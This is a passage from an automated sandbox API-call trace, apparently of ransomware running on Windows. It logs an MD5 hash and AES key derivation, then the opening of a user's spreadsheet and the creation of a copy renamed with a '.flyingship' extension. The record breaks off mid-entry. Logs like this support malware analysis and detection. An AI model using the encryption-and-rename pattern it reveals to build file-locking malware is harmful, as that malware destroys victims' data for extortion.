[0175.492] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.492] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.524] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.524] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.524] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.524] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.524] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.524] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.524] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.525] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.525] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.525] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.525] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.525] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.526] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.526] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0175.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.526] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0175.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.526] CryptDestroyHash (hHash=0x90af58) returned 1 [0175.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\odo7bquezcp1nl2g.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0175.527] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.527] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0175.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0175.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0175.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0175.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0175.528] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0175.529] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0175.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0175.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0175.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0175.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0175.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa5f008 [0175.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\odo7bquezcp1nl2g.flyingship.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.532] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0175.532] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0175.532] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0175.533] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0175.534] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0175.534] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xc3fc, lpOverlapped=0x0) returned 1 [0175.537] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0175.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0175.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc3fc) returned 0xa6f010 [0175.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0175.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0175.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0175.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc3fc) returned 0xa7b418 [0175.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc3fc) returned 0xa6f010 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0175.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 